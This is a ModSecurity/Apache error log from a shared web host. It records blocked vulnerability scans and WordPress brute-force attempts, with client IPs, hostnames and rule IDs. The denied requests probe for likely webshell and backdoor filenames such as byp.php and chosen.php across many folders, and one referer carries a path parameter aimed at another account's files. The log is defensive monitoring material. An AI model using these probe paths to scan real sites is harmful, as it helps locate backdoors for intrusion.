[Tue May 26 13:55:19.330995 2026] [security2:error] [pid 560287:tid 560487] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY7pmX5s6sDS3wJVcoFgAAAMY"]
[Tue May 26 13:55:19.964694 2026] [autoindex:error] [pid 560287:tid 560505] [client 192.71.126.207:54933] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:55:20.112593 2026] [security2:error] [pid 560287:tid 560290] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2012a-EzhamSuvai_Cantonment.php"] [unique_id "ahVY8JmX5s6sDS3wJVcoIAAA6wI"]
[Tue May 26 13:55:21.093110 2026] [security2:error] [pid 560287:tid 560407] [remote 74.208.170.33:57552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVY8JmX5s6sDS3wJVcoJQAA4XY"]
[Tue May 26 13:55:21.113917 2026] [security2:error] [pid 560287:tid 560411] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2025a-KaizenServApt.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoJwAA23o"]
[Tue May 26 13:55:21.170110 2026] [security2:error] [pid 560287:tid 560496] [client 40.83.92.30:6091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoJgAAAM8"]
[Tue May 26 13:55:21.170284 2026] [security2:error] [pid 560287:tid 560496] [client 40.83.92.30:6091] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoJgAAAM8"]
[Tue May 26 13:55:21.606939 2026] [security2:error] [pid 560287:tid 560518] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoKgAAAOQ"]
[Tue May 26 13:55:21.623000 2026] [security2:error] [pid 560287:tid 560403] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-designandbuild.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoLgAA9nI"]
[Tue May 26 13:55:21.683921 2026] [security2:error] [pid 560287:tid 560449] [client 40.83.92.30:5767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoLwAAAKM"]
[Tue May 26 13:55:21.684049 2026] [security2:error] [pid 560287:tid 560449] [client 40.83.92.30:5767] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVY8ZmX5s6sDS3wJVcoLwAAAKM"]
[Tue May 26 13:55:22.129320 2026] [security2:error] [pid 560287:tid 560393] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2026a-CholaBoardRoom.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoMAAA02g"]
[Tue May 26 13:55:22.243261 2026] [security2:error] [pid 560287:tid 560424] [client 40.83.92.30:6131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/archive.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoNQAAAIs"]
[Tue May 26 13:55:22.243406 2026] [security2:error] [pid 560287:tid 560424] [client 40.83.92.30:6131] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/archive.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoNQAAAIs"]
[Tue May 26 13:55:22.456761 2026] [security2:error] [pid 560287:tid 560551] [client 202.141.30.10:35376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoNwAAAQM"]
[Tue May 26 13:55:22.456886 2026] [security2:error] [pid 560287:tid 560551] [client 202.141.30.10:35376] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoNwAAAQM"]
[Tue May 26 13:55:22.593692 2026] [security2:error] [pid 560287:tid 560457] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY8pmX5s6sDS3wJVcoNAAAAKo"]
[Tue May 26 13:55:22.727249 2026] [security2:error] [pid 555743:tid 555930] [client 40.83.92.30:6088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/66.php"] [unique_id "ahVY8sjqAquC0YaxQjDEqQAAAUM"]
[Tue May 26 13:55:22.727430 2026] [security2:error] [pid 555743:tid 555930] [client 40.83.92.30:6088] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/66.php"] [unique_id "ahVY8sjqAquC0YaxQjDEqQAAAUM"]
[Tue May 26 13:55:23.267452 2026] [security2:error] [pid 560287:tid 560503] [client 40.83.92.30:5763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVY85mX5s6sDS3wJVcoPgAAANU"]
[Tue May 26 13:55:23.267596 2026] [security2:error] [pid 560287:tid 560503] [client 40.83.92.30:5763] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVY85mX5s6sDS3wJVcoPgAAANU"]
[Tue May 26 13:55:23.753962 2026] [security2:error] [pid 560287:tid 560467] [client 40.83.92.30:5773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ms-edit.php"] [unique_id "ahVY85mX5s6sDS3wJVcoSgAAALQ"]
[Tue May 26 13:55:23.754099 2026] [security2:error] [pid 560287:tid 560467] [client 40.83.92.30:5773] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ms-edit.php"] [unique_id "ahVY85mX5s6sDS3wJVcoSgAAALQ"]
[Tue May 26 13:55:24.085278 2026] [security2:error] [pid 560287:tid 560535] [client 24.47.155.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY85mX5s6sDS3wJVcoSQAAAPU"]
[Tue May 26 13:55:24.304253 2026] [security2:error] [pid 560287:tid 560511] [client 40.83.92.30:5777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVY9JmX5s6sDS3wJVcoUQAAAN0"]
[Tue May 26 13:55:24.304383 2026] [security2:error] [pid 560287:tid 560511] [client 40.83.92.30:5777] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVY9JmX5s6sDS3wJVcoUQAAAN0"]
[Tue May 26 13:55:24.530437 2026] [security2:error] [pid 560287:tid 560552] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY9JmX5s6sDS3wJVcoUAAAAQQ"]
[Tue May 26 13:55:24.836198 2026] [security2:error] [pid 560287:tid 560427] [client 40.83.92.30:6142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/404.php"] [unique_id "ahVY9JmX5s6sDS3wJVcoVQAAAI4"]
[Tue May 26 13:55:24.836328 2026] [security2:error] [pid 560287:tid 560427] [client 40.83.92.30:6142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/404.php"] [unique_id "ahVY9JmX5s6sDS3wJVcoVQAAAI4"]
[Tue May 26 13:55:24.858925 2026] [security2:error] [pid 560287:tid 560291] [remote 74.7.241.58:42536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVY9JmX5s6sDS3wJVcoVwAAtwM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common
[Tue May 26 13:55:25.314673 2026] [security2:error] [pid 560287:tid 560528] [client 40.83.92.30:6080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file3.php"] [unique_id "ahVY9ZmX5s6sDS3wJVcoWQAAAO4"]
[Tue May 26 13:55:25.314793 2026] [security2:error] [pid 560287:tid 560528] [client 40.83.92.30:6080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file3.php"] [unique_id "ahVY9ZmX5s6sDS3wJVcoWQAAAO4"]
[Tue May 26 13:55:25.845584 2026] [security2:error] [pid 560287:tid 560523] [client 40.83.92.30:6136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVY9ZmX5s6sDS3wJVcoXQAAAOk"]
[Tue May 26 13:55:25.845698 2026] [security2:error] [pid 560287:tid 560523] [client 40.83.92.30:6136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahVY9ZmX5s6sDS3wJVcoXQAAAOk"]
[Tue May 26 13:55:26.339169 2026] [security2:error] [pid 560287:tid 560517] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY9ZmX5s6sDS3wJVcoYAAAAOM"]
[Tue May 26 13:55:26.461094 2026] [security2:error] [pid 555743:tid 555922] [client 40.83.92.30:6087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/byp.php"] [unique_id "ahVY9sjqAquC0YaxQjDEuwAAATs"]
[Tue May 26 13:55:26.461204 2026] [security2:error] [pid 555743:tid 555922] [client 40.83.92.30:6087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/byp.php"] [unique_id "ahVY9sjqAquC0YaxQjDEuwAAATs"]
[Tue May 26 13:55:26.673769 2026] [security2:error] [pid 555743:tid 555897] [client 74.7.228.53:59354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "payment.pdrwebsolutions.cloud"] [uri "/robots.txt"] [unique_id "ahVY9sjqAquC0YaxQjDEvgABInw"]
[Tue May 26 13:55:26.754466 2026] [security2:error] [pid 555743:tid 555932] [client 74.7.228.53:59354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "payment.pdrwebsolutions.cloud"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahVY9sjqAquC0YaxQjDEwgABRUI"], referer: https://payment.pdrwebsolutions.cloud/robots.txt
[Tue May 26 13:55:26.960945 2026] [security2:error] [pid 560287:tid 560461] [client 40.83.92.30:6126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVY9pmX5s6sDS3wJVcoZgAAAK4"]
[Tue May 26 13:55:26.961041 2026] [security2:error] [pid 560287:tid 560461] [client 40.83.92.30:6126] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVY9pmX5s6sDS3wJVcoZgAAAK4"]
[Tue May 26 13:55:26.991953 2026] [security2:error] [pid 560287:tid 560296] [remote 178.104.90.233:50350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVY9pmX5s6sDS3wJVcoYwAA_wg"]
[Tue May 26 13:55:27.130004 2026] [security2:error] [pid 560287:tid 560352] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-aboutus.php"] [unique_id "ahVY95mX5s6sDS3wJVcoagAAoj8"]
[Tue May 26 13:55:27.454462 2026] [security2:error] [pid 555743:tid 555883] [client 40.83.92.30:5761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index/chosen.php"] [unique_id "ahVY98jqAquC0YaxQjDExgAAARQ"]
[Tue May 26 13:55:27.454571 2026] [security2:error] [pid 555743:tid 555883] [client 40.83.92.30:5761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index/chosen.php"] [unique_id "ahVY98jqAquC0YaxQjDExgAAARQ"]
[Tue May 26 13:55:27.785807 2026] [security2:error] [pid 560287:tid 560515] [client 129.222.147.134:42565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY95mX5s6sDS3wJVcobgAAAOE"]
[Tue May 26 13:55:27.785971 2026] [security2:error] [pid 560287:tid 560515] [client 129.222.147.134:42565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY95mX5s6sDS3wJVcobgAAAOE"]
[Tue May 26 13:55:27.881764 2026] [security2:error] [pid 555743:tid 555894] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY98jqAquC0YaxQjDEyQAAAR8"]
[Tue May 26 13:55:27.934638 2026] [security2:error] [pid 560287:tid 560447] [client 40.83.92.30:6102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/about/chosen.php"] [unique_id "ahVY95mX5s6sDS3wJVcocgAAAKE"]
[Tue May 26 13:55:27.934729 2026] [security2:error] [pid 560287:tid 560447] [client 40.83.92.30:6102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/about/chosen.php"] [unique_id "ahVY95mX5s6sDS3wJVcocgAAAKE"]
[Tue May 26 13:55:28.460215 2026] [security2:error] [pid 560287:tid 560529] [client 40.83.92.30:6096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/as/chosen.php"] [unique_id "ahVY-JmX5s6sDS3wJVcoeAAAAO8"]
[Tue May 26 13:55:28.460308 2026] [security2:error] [pid 560287:tid 560529] [client 40.83.92.30:6096] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/as/chosen.php"] [unique_id "ahVY-JmX5s6sDS3wJVcoeAAAAO8"]
[Tue May 26 13:55:28.929056 2026] [security2:error] [pid 560287:tid 560514] [client 40.83.92.30:5764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/init.php"] [unique_id "ahVY-JmX5s6sDS3wJVcoegAAAOA"]
[Tue May 26 13:55:28.929185 2026] [security2:error] [pid 560287:tid 560514] [client 40.83.92.30:5764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/init.php"] [unique_id "ahVY-JmX5s6sDS3wJVcoegAAAOA"]
[Tue May 26 13:55:29.414600 2026] [security2:error] [pid 560287:tid 560419] [client 40.83.92.30:5726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file/chosen.php"] [unique_id "ahVY-ZmX5s6sDS3wJVcogQAAAIY"]
[Tue May 26 13:55:29.414731 2026] [security2:error] [pid 560287:tid 560419] [client 40.83.92.30:5726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/file/chosen.php"] [unique_id "ahVY-ZmX5s6sDS3wJVcogQAAAIY"]
[Tue May 26 13:55:29.757499 2026] [security2:error] [pid 555743:tid 555961] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY-cjqAquC0YaxQjDE2gAAAWI"]
[Tue May 26 13:55:29.876272 2026] [security2:error] [pid 560287:tid 560445] [client 40.83.92.30:6094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/chosen/chosen.php"] [unique_id "ahVY-ZmX5s6sDS3wJVcohwAAAJ8"]
[Tue May 26 13:55:29.876401 2026] [security2:error] [pid 560287:tid 560445] [client 40.83.92.30:6094] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/chosen/chosen.php"] [unique_id "ahVY-ZmX5s6sDS3wJVcohwAAAJ8"]
[Tue May 26 13:55:30.372676 2026] [security2:error] [pid 560287:tid 560507] [client 40.83.92.30:6122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/css/chosen.php"] [unique_id "ahVY-pmX5s6sDS3wJVcoiQAAANk"]
[Tue May 26 13:55:30.372812 2026] [security2:error] [pid 560287:tid 560507] [client 40.83.92.30:6122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/css/chosen.php"] [unique_id "ahVY-pmX5s6sDS3wJVcoiQAAANk"]
